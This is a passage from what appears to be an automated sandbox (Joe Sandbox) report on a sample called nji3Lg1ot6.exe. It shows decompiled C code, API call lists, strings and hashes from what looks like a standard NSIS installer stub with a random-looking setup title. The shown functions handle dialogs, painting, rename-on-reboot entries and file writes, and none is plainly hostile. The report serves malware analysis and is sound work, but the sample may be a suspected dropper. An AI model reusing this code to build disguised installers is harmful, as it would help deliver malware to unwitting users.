                      							goto L26;
                      						} else {
                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                      								SendMessageA( *0x423ea8, 0x111, 1, 0);
                      							}
                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                      								SendMessageA( *0x423ea8, 0x10, 0, 0);
                      							}
                      							return 1;
                      						}
                      					}
                      					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                      						goto L25;
                      					} else {
                      						_t103 =  *0x41fc68; // 0x0
                      						_t25 = _t103 + 0x14; // 0x14
                      						_t112 = _t25;
                      						if(( *_t112 & 0x00000020) == 0) {
                      							goto L25;
                      						}
                      						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                      						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                      						E0040420A();
                      						goto L11;
                      					}
                      				}
                      				_t98 = _a16;
                      				_t113 =  *(_t98 + 0x30);
                      				if(_t113 < 0) {
                      					_t107 =  *0x42367c; // 0x4e3b8b
                      					_t113 =  *(_t107 - 4 + _t113 * 4);
                      				}
                      				_t71 =  *0x423ed8; // 0x4e2694
                      				_push( *((intOrPtr*)(_t98 + 0x34)));
                      				_t114 = _t113 + _t71;
                      				_push(0x22);
                      				_a16 =  *_t114;
                      				_v12 = _v12 & 0x00000000;
                      				_t115 = _t114 + 1;
                      				_v16 = _t115;
                      				_v8 = E00403F4B;
                      				E00403E37(_a4);
                      				_push( *((intOrPtr*)(_t98 + 0x38)));
                      				_push(0x23);
                      				E00403E37(_a4);
                      				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                      				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                      				_t99 = GetDlgItem(_a4, 0x3e8);
                      				E00403E6C(_t99);
                      				SendMessageA(_t99, 0x45b, 1, 0);
                      				_t85 =  *0x423eb0; // 0x4de368
                      				_t86 =  *(_t85 + 0x68);
                      				if(_t86 < 0) {
                      					_t86 = GetSysColor( ~_t86);
                      				}
                      				SendMessageA(_t99, 0x443, 0, _t86);
                      				SendMessageA(_t99, 0x445, 0, 0x4010000);
                      				 *0x41f45c =  *0x41f45c & 0x00000000;
                      				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                      				SendMessageA(_t99, 0x449, _a16,  &_v16);
                      				 *0x420478 =  *0x420478 & 0x00000000;
                      				return 0;
                      			}

                      APIs
                      • CheckDlgButton.USER32 ref: 0040400A
                      • GetDlgItem.USER32 ref: 0040401E
                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                      • GetSysColor.USER32(?), ref: 0040404D
                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                      • lstrlenA.KERNEL32(?), ref: 00404075
                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                      • GetDlgItem.USER32 ref: 004040F5
                      • SendMessageA.USER32(00000000), ref: 004040F8
                      • GetDlgItem.USER32 ref: 00404123
                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                      • LoadCursorA.USER32 ref: 00404172
                      • SetCursor.USER32(00000000), ref: 0040417B
                      • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                      • LoadCursorA.USER32 ref: 0040419B
                      • SetCursor.USER32(00000000), ref: 0040419E
                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                      • String ID: @.B$N$hM$open
                      • API String ID: 3615053054-4027334107
                      • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                      • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                      • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                      • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                      				struct tagLOGBRUSH _v16;
                      				struct tagRECT _v32;
                      				struct tagPAINTSTRUCT _v96;
                      				struct HDC__* _t70;
                      				struct HBRUSH__* _t87;
                      				struct HFONT__* _t94;
                      				long _t102;
                      				intOrPtr _t115;
                      				signed int _t126;
                      				struct HDC__* _t128;
                      				intOrPtr _t130;
                      
                      				if(_a8 == 0xf) {
                      					_t130 =  *0x423eb0; // 0x4de368
                      					_t70 = BeginPaint(_a4,  &_v96);
                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                      					_a8 = _t70;
                      					GetClientRect(_a4,  &_v32);
                      					_t126 = _v32.bottom;
                      					_v32.bottom = _v32.bottom & 0x00000000;
                      					while(_v32.top < _t126) {
                      						_a12 = _t126 - _v32.top;
                      						asm("cdq");
                      						asm("cdq");
                      						asm("cdq");
                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                      						_t87 = CreateBrushIndirect( &_v16);
                      						_v32.bottom = _v32.bottom + 4;
                      						_a16 = _t87;
                      						FillRect(_a8,  &_v32, _t87);
                      						DeleteObject(_a16);
                      						_v32.top = _v32.top + 4;
                      					}
                      					if( *(_t130 + 0x58) != 0xffffffff) {
                      						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                      						_a16 = _t94;
                      						if(_t94 != 0) {
                      							_t128 = _a8;
                      							_v32.left = 0x10;
                      							_v32.top = 8;
                      							SetBkMode(_t128, 1);
                      							SetTextColor(_t128,  *(_t130 + 0x58));
                      							_a8 = SelectObject(_t128, _a16);
                      							DrawTextA(_t128, "jefgbrzfgglybaslbprz Setup", 0xffffffff,  &_v32, 0x820);
                      							SelectObject(_t128, _a8);
                      							DeleteObject(_a16);
                      						}
                      					}
                      					EndPaint(_a4,  &_v96);
                      					return 0;
                      				}
                      				_t102 = _a16;
                      				if(_a8 == 0x46) {
                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                      					_t115 =  *0x423ea8; // 0x0
                      					 *((intOrPtr*)(_t102 + 4)) = _t115;
                      				}
                      				return DefWindowProcA(_a4, _a8, _a12, _t102);
                      			}

                      APIs
                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                      • BeginPaint.USER32(?,?), ref: 00401047
                      • GetClientRect.USER32 ref: 0040105B
                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                      • FillRect.USER32 ref: 004010E4
                      • DeleteObject.GDI32(?), ref: 004010ED
                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                      • SetTextColor.GDI32(00000000,?), ref: 00401130
                      • SelectObject.GDI32(00000000,?), ref: 00401140
                      • DrawTextA.USER32(00000000,jefgbrzfgglybaslbprz Setup,000000FF,00000010,00000820), ref: 00401156
                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                      • DeleteObject.GDI32(?), ref: 00401165
                      • EndPaint.USER32(?,?), ref: 0040116E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                      • String ID: F$hM$jefgbrzfgglybaslbprz Setup
                      • API String ID: 941294808-3372912446
                      • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                      • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                      • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                      • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E004057D3() {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t15;
                      				long _t16;
                      				intOrPtr _t18;
                      				int _t20;
                      				void* _t28;
                      				long _t29;
                      				intOrPtr* _t37;
                      				int _t43;
                      				void* _t44;
                      				long _t47;
                      				CHAR* _t49;
                      				void* _t51;
                      				void* _t53;
                      				intOrPtr* _t54;
                      				void* _t55;
                      				void* _t56;
                      
                      				_t15 = E00405DA3(1);
                      				_t49 =  *(_t55 + 0x18);
                      				if(_t15 != 0) {
                      					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                      					if(_t20 != 0) {
                      						L16:
                      						 *0x423f30 =  *0x423f30 + 1;
                      						return _t20;
                      					}
                      				}
                      				 *0x422628 = 0x4c554e;
                      				if(_t49 == 0) {
                      					L5:
                      					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                      					if(_t16 != 0 && _t16 <= 0x400) {
                      						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                      						_t18 =  *0x423eb0; // 0x4de368
                      						_t56 = _t55 + 0x10;
                      						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
                      						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                      						_t53 = _t20;
                      						 *(_t56 + 0x14) = _t53;
                      						if(_t53 == 0xffffffff) {
                      							goto L16;
                      						}
                      						_t47 = GetFileSize(_t53, 0);
                      						_t7 = _t43 + 0xa; // 0xa
                      						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                      						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                      							L15:
                      							_t20 = CloseHandle(_t53);
                      							goto L16;
                      						} else {
                      							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                      								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                      								if(_t28 == 0) {
                      									L13:
                      									_t29 = _t47;
                      									L14:
                      									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                      									SetFilePointer(_t53, 0, 0, 0);
                      									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                      									GlobalFree(_t51);
                      									goto L15;
                      								}
                      								_t37 = _t28 + 1;
                      								_t44 = _t51 + _t47;
                      								_t54 = _t37;
                      								if(_t37 >= _t44) {
                      									L21:
                      									_t53 =  *(_t56 + 0x14);
                      									_t29 = _t37 - _t51;
                      									goto L14;
                      								} else {
                      									goto L20;
                      								}
                      								do {
                      									L20:
                      									 *((char*)(_t43 + _t54)) =  *_t54;
                      									_t54 = _t54 + 1;
                      								} while (_t54 < _t44);
                      								goto L21;
                      							}
                      							E00405A85(_t51 + _t47, "[Rename]\r\n");
                      							_t47 = _t47 + 0xa;
                      							goto L13;
                      						}
                      					}
                      				} else {
                      					CloseHandle(E0040575C(_t49, 0, 1));
                      					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                      					if(_t16 != 0 && _t16 <= 0x400) {
                      						goto L5;
                      					}
                      				}
                      				return _t16;
                      			}

                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                      • GetShortPathNameA.KERNEL32 ref: 00405829
                      • GetShortPathNameA.KERNEL32 ref: 00405846
                      • wsprintfA.USER32 ref: 00405864
                      • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                      • GlobalFree.KERNEL32 ref: 00405923
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                      • String ID: %s=%s$(&B$[Rename]$hM
                      • API String ID: 3772915668-2130575897
                      • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                      • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                      • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                      • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405CE3(CHAR* _a4) {
                      				char _t5;
                      				char _t7;
                      				char* _t15;
                      				char* _t16;
                      				CHAR* _t17;
                      
                      				_t17 = _a4;
                      				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                      					_t17 =  &(_t17[4]);
                      				}
                      				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                      					_t17 =  &(_t17[2]);
                      				}
                      				_t5 =  *_t17;
                      				_t15 = _t17;
                      				_t16 = _t17;
                      				if(_t5 != 0) {
                      					do {
                      						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                      							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                      							_t16 = CharNextA(_t16);
                      						}
                      						_t17 = CharNextA(_t17);
                      						_t5 =  *_t17;
                      					} while (_t5 != 0);
                      				}
                      				 *_t16 =  *_t16 & 0x00000000;
                      				while(1) {
                      					_t16 = CharPrevA(_t15, _t16);
                      					_t7 =  *_t16;
                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                      						break;
                      					}
                      					 *_t16 =  *_t16 & 0x00000000;
                      					if(_t15 < _t16) {
                      						continue;
                      					}
                      					break;
                      				}
                      				return _t7;
                      			}

                      APIs
                      • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      Strings
                      Similarity
                      • API ID: Char$Next$Prev
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 589700163-328088845
                      • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                      • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                      • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                      • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                      				char _v68;
                      				void* _t11;
                      				CHAR* _t19;
                      
                      				if(_a8 == 0x110) {
                      					SetTimer(_a4, 1, 0xfa, 0);
                      					_a8 = 0x113;
                      				}
                      				if(_a8 == 0x113) {
                      					_t11 = E00402BA9();
                      					_t19 = "unpacking data: %d%%";
                      					if( *0x423eb0 == 0) {
                      						_t19 = "verifying installer: %d%%";
                      					}
                      					wsprintfA( &_v68, _t19, _t11);
                      					SetWindowTextA(_a4,  &_v68);
                      					SetDlgItemTextA(_a4, 0x406,  &_v68);
                      				}
                      				return 0;
                      			}

                      APIs
                      Strings
                      Similarity
                      • API ID: Text$ItemTimerWindowwsprintf
                      • String ID: hM$unpacking data: %d%%$verifying installer: %d%%
                      • API String ID: 1451636040-392548334
                      • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                      • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                      • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                      				struct tagLOGBRUSH _v16;
                      				long _t35;
                      				long _t37;
                      				void* _t40;
                      				long* _t49;
                      
                      				if(_a4 + 0xfffffecd > 5) {
                      					L15:
                      					return 0;
                      				}
                      				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                      				if(_t49 == 0) {
                      					goto L15;
                      				}
                      				_t35 =  *_t49;
                      				if((_t49[5] & 0x00000002) != 0) {
                      					_t35 = GetSysColor(_t35);
                      				}
                      				if((_t49[5] & 0x00000001) != 0) {
                      					SetTextColor(_a8, _t35);
                      				}
                      				SetBkMode(_a8, _t49[4]);
                      				_t37 = _t49[1];
                      				_v16.lbColor = _t37;
                      				if((_t49[5] & 0x00000008) != 0) {
                      					_t37 = GetSysColor(_t37);
                      					_v16.lbColor = _t37;
                      				}
                      				if((_t49[5] & 0x00000004) != 0) {
                      					SetBkColor(_a8, _t37);
                      				}
                      				if((_t49[5] & 0x00000010) != 0) {
                      					_v16.lbStyle = _t49[2];
                      					_t40 = _t49[3];
                      					if(_t40 != 0) {
                      						DeleteObject(_t40);
                      					}
                      					_t49[3] = CreateBrushIndirect( &_v16);
                      				}
                      				return _t49[3];
                      			}

                      APIs
                      Similarity
                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                      • String ID:
                      • API String ID: 2320649405-0
                      • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                      • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E0040266E(struct _OVERLAPPED* __ebx) {
                      				void* _t27;
                      				long _t32;
                      				struct _OVERLAPPED* _t47;
                      				void* _t51;
                      				void* _t53;
                      				void* _t56;
                      				void* _t57;
                      				void* _t58;
                      
                      				_t47 = __ebx;
                      				 *(_t58 - 8) = 0xfffffd66;
                      				_t52 = E004029E8(0xfffffff0);
                      				 *(_t58 - 0x44) = _t24;
                      				if(E004055E5(_t52) == 0) {
                      					E004029E8(0xffffffed);
                      				}
                      				E0040573D(_t52);
                      				_t27 = E0040575C(_t52, 0x40000000, 2);
                      				 *(_t58 + 8) = _t27;
                      				if(_t27 != 0xffffffff) {
                      					_t32 =  *0x423eb4; // 0x7e00
                      					 *(_t58 - 0x2c) = _t32;
                      					_t51 = GlobalAlloc(0x40, _t32);
                      					if(_t51 != _t47) {
                      						E004031DA(_t47);
                      						E004031A8(_t51,  *(_t58 - 0x2c));
                      						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                      						 *(_t58 - 0x30) = _t56;
                      						if(_t56 != _t47) {
                      							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                      							while( *_t56 != _t47) {
                      								_t49 =  *_t56;
                      								_t57 = _t56 + 8;
                      								 *(_t58 - 0x38) =  *_t56;
                      								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                      								_t56 = _t57 +  *(_t58 - 0x38);
                      							}
                      							GlobalFree( *(_t58 - 0x30));
                      						}
                      						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                      						GlobalFree(_t51);
                      						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                      					}
                      					CloseHandle( *(_t58 + 8));
                      				}
                      				_t53 = 0xfffffff3;
                      				if( *(_t58 - 8) < _t47) {
                      					_t53 = 0xffffffef;
                      					DeleteFileA( *(_t58 - 0x44));
                      					 *((intOrPtr*)(_t58 - 4)) = 1;
                      				}
                      				_push(_t53);
                      				E00401423();
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                      				return 0;
                      			}

                      APIs
                      • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                      • GlobalFree.KERNEL32 ref: 00402717
                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                      • GlobalFree.KERNEL32 ref: 00402730
                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                      Similarity
                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                      • String ID:
                      • API String ID: 3294113728-0
                      • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                      • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404E23(CHAR* _a4, CHAR* _a8) {
                      				struct HWND__* _v8;
                      				signed int _v12;
                      				CHAR* _v32;
                      				long _v44;
                      				int _v48;
                      				void* _v52;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				CHAR* _t26;
                      				signed int _t27;
                      				CHAR* _t28;
                      				long _t29;
                      				signed int _t39;
                      
                      				_t26 =  *0x423684; // 0x0
                      				_v8 = _t26;
                      				if(_t26 != 0) {
                      					_t27 =  *0x423f54; // 0x0
                      					_v12 = _t27;
                      					_t39 = _t27 & 0x00000001;
                      					if(_t39 == 0) {
                      						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                      					}
                      					_t26 = lstrlenA(0x41fc70);
                      					_a4 = _t26;
                      					if(_a8 == 0) {
                      						L6:
                      						if((_v12 & 0x00000004) == 0) {
                      							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                      						}
                      						if((_v12 & 0x00000002) == 0) {
                      							_v32 = 0x41fc70;
                      							_v52 = 1;
                      							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                      							_v44 = 0;
                      							_v48 = _t29 - _t39;
                      							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                      							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                      						}
                      						if(_t39 != 0) {
                      							_t28 = _a4;
                      							 *((char*)(_t28 + 0x41fc70)) = 0;
                      							return _t28;
                      						}
                      					} else {
                      						_t26 =  &(_a4[lstrlenA(_a8)]);
                      						if(_t26 < 0x800) {
                      							_t26 = lstrcatA(0x41fc70, _a8);
                      							goto L6;
                      						}
                      					}
                      				}
                      				return _t26;
                      			}

                      APIs
                      • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      Similarity
                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                      • String ID:
                      • API String ID: 2531174081-0
                      • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                      • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                      • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                      				long _v8;
                      				signed char _v12;
                      				unsigned int _v16;
                      				void* _v20;
                      				intOrPtr _v24;
                      				long _v56;
                      				void* _v60;
                      				long _t15;
                      				unsigned int _t19;
                      				signed int _t25;
                      				struct HWND__* _t28;
                      
                      				_t28 = _a4;
                      				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                      				if(_a8 == 0) {
                      					L4:
                      					_v56 = _t15;
